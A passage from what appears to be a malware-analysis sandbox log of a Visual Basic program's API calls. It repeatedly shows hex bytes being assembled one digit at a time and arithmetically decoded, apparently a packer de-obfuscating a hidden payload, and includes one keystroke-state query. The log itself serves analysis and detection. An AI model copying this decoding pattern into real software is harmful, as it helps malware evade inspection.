pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.587] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.587] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.587] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.587] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.587] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.587] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.587] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.587] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.588] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.588] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.588] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.588] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.588] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.588] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.588] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.588] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.588] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.589] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.589] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.589] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.589] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.589] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.589] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.589] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.589] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.589] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.590] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.590] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.590] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.590] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.590] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.590] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.590] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.590] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.590] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.590] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.590] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.590] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.591] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.591] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.591] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.591] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.591] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.591] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.591] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.591] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.591] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.591] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.591] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.592] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.592] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.592] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.592] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.592] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.592] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.592] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.592] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.592] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.592] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.592] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.592] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.592] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.593] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.593] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.593] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.593] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.593] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.593] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.593] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.593] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.593] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.593] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.593] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.594] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.594] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.594] VarBstrCat (in: bstrLeft="&Hd", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.594] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.594] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.594] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.594] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.594] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.594] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.594] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.595] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.595] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.595] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.617] GetAsyncKeyState (vKey=3) returned 0 [0112.617] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.617] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.618] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.618] VarBstrCat (in: bstrLeft="&Ha", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.618] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.618] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.618] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.618] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.618] VarBstrCat (in: bstrLeft="&Ha", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.618] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.618] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.618] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.618] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.619] VarBstrCat (in: bstrLeft="&Ha", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.619] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.619] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.619] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.619] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.619] VarBstrCat (in: bstrLeft="&Ha", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.619] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.619] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.619] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.619] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.619] VarBstrCat (in: bstrLeft="&Ha", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.619] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.620] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.620] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.620] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.620] VarBstrCat (in: bstrLeft="&Ha", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.620] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.620] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.620] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.620] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.620] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.620] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.620] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.621] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.621] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.621] VarBstrCat (in: bstrLeft="&Hb", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.621] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.621] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.621] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.621] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.621] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.621] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.621] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.621] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.621] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.621] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.621] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.621] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.621] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.622] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.622] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.622] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.622] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.622] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.622] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.622] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.622] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.622] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.622] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.622] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.622] VarBstrCat (in: bstrLeft="&H3", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.622] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.622] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.622] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.623] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.623] VarBstrCat (in: bstrLeft="&H7", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.623] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.623] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.623] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.623] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.623] VarBstrCat (in: bstrLeft="&H8", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.623] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.623] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.623] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.623] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.623] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.623] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.623] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.623] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.624] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.624] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.624] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.624] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.624] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.624] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.624] VarBstrCat (in: bstrLeft="&H0", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.624] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.624] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.624] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.624] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.624] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.624] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.624] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.624] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.625] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.625] VarBstrCat (in: bstrLeft="&H2", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.625] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.625] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.625] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.625] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.625] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.625] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.625] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.625] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.625] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.625] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0112.625] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0112.625] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0112.625] VarAdd (in: 